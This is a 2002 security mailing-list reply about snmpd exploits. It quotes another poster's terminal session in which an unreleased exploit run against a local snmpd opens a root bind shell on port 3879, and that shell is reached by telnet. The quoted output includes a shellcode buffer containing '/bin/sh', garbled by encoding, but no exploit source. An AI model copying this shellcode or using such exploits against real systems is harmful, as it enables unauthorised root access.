Re: snmpd exploit examination - snmpwalk

[KF <dotslash () snosoft com>]

Don't get me wrong...I didn't say it couldn't be done... I have seen the 
results of a successful exploitation as well...I was in particular 
speaking about the questionable exploits that had been released to the 
lists...which happened to be dependant on snmpwalk. There was already 
claims of them being bunk made by someone else, I was just sharing my 2 
cents on that particular subject.
-KF

xbud wrote:

> that's great.. 
> but how would you explain a root shell sitting on a port i defined on an 
> exploit i didn't release?
>
> note! I still haven't tested the "Zen-Parse" one .
>
> [root@dejaking /root]# snmpd
> [root@dejaking /root]# whereis snmpd
> snmpd: /usr/sbin/snmpd /usr/man/man1/snmpd.1.gz
> [root@dejaking /root]# ps -ef | grep snmpd
> root     15027     1  6 18:05 pts/2    00:00:00 snmpd
> root     15030 14973  0 18:05 pts/2    00:00:00 grep snmpd
> [root@dejaking /root]# gdb /usr/sbin/snmpd
> GNU gdb 19991004
> Copyright 1998 Free Software Foundation, Inc.
> GDB is free software, covered by the GNU General Public License, and you are
> welcome to change it and/or distribute copies of it under certain conditions.
> Type "show copying" to see the conditions.
> There is absolutely no warranty for GDB.  Type "show warranty" for details.
> This GDB was configured as "i386-redhat-linux"...
> (no debugging symbols found)...
> (gdb) at 15027
> Attaching to program: /usr/sbin/snmpd, Pid 15027
> Reading symbols from /usr/lib/libucdagent.so.0...
> (no debugging symbols found)...done.
> Reading symbols from /usr/lib/libucdmibs.so.0...(no debugging symbols 
> found)...
> done.
> <snip>
>
> 0x4020c17e in __select () from /lib/libc.so.6
> (gdb) c
> Continuing.
>
> Program received signal SIGTRAP, Trace/breakpoint trap.
> 0x40001990 in _start () at rtld.c:142
> 142     rtld.c: No such file or directory.
> (gdb) c
> Continuing.
> : command not found
>
>
> [xbud@dejaking xbud]$ ./ecksploit -20
> sizeof(buffer) = 256
> ret = 0xbfffd61c
> buffer = 
> Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ
> ¿Öÿ¿?????????????????????????0/00å1Ò²f0/00Ð1É0/00ËC0/00]øC0/00]ôK0/00Mü?MôÍEUR1É0/00EôCf0/00]ìfÇEî'0/00Mð?Eì0/00
> EøÆEü0/00Ð?MôÍEUR0/00ÐCCÍEUR0/00ÐCÍEUR0/00Ã1ɲ?0/00ÐÍEUR0/00ÐAÍEURë?^0/001À^F0/00E
>                                                 °
>                                                  0/00ó??U
>                                                       ÍEURèãÿÿÿ/bin/shÿ¿
> Timeout: No Response from 127.0.0.1
> [xbud@dejaking xbud]$ netstat -an --tcp
> Active Internet connections (servers and established)
> Proto Recv-Q Send-Q Local Address           Foreign Address         State
> tcp        0      0 0.0.0.0:3879            0.0.0.0:*               LISTEN
> tcp        0      0 0.0.0.0:6011            0.0.0.0:*               LISTEN
> tcp        0      0 xx.xx.xx.xx:22         24.28.xx.xx:64408    ESTABLISHED
> tcp        0      0 0.0.0.0:6010            0.0.0.0:*               LISTEN
> tcp        0      0 xx.xx.xx.xx:22         24.28.xx.xx:64407    ESTABLISHED
>
> [xbud@dejaking xbud]$ telnet localhost 3879
> Trying 127.0.0.1...
> Connected to localhost.localdomain (127.0.0.1).
> Escape character is '^]'.
> id;
> uid=0(root) gid=0(root) 
> groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10
> (wheel)
> pwd;
> /root
>
> cheers, 
> xbud
>
> tested on both 4.1.1 and 4.0.1 source and default install's.
>
> cheers
> On Wednesday 20 February 2002 03:14 pm, you wrote: